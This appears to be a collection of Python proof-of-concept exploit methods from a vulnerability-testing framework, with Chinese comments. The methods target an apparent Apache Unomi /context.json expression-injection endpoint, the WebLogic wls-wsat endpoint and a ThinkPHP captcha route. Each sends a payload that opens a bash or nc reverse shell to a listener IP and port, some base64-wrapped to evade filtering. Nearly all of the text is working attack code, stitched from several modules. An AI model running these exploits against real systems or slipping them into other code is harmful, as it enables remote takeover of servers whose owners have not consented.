def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = get_listener_ip() PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} ' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = get_listener_ip() PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _shell(self): """ shell模式下,只能运行单个PoC脚本,控制台会进入shell交互模式执行命令及输出 """ cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port()) # 攻击代码 execute cmd pass
def _options(self): o = OrderedDict() payload = { "nc": REVERSE_PAYLOAD.NC, "bash": REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port()), } o["command"] = OptDict(selected="bash", default=payload) return o
def _shell(self): username = '******' password = '******' command = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port()) try: start(self.url, command, username, password, shell=True) except Exception as ex: logger.error(str(ex))
def _shell(self): vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType') cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1'.format( get_listener_ip(), get_listener_port()) shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd) headers = { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" } try: requests.post(vul_url, data=shell_payload, headers=headers) except Exception as e: logger.warn(str(e))
def _shell(self): vulurl = self.url + "/index.php?s=captcha" # 生成写入文件的shellcode _list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(), os_target=OS.LINUX, os_target_arch=OS_ARCH.X86) for i in _list: data = { '_method': '__construct', 'filter[]': 'system', 'method': 'get', 'server[REQUEST_METHOD]': i } headers = {"Content-Type": "application/x-www-form-urlencoded"} requests.post(vulurl, data=data, headers=headers)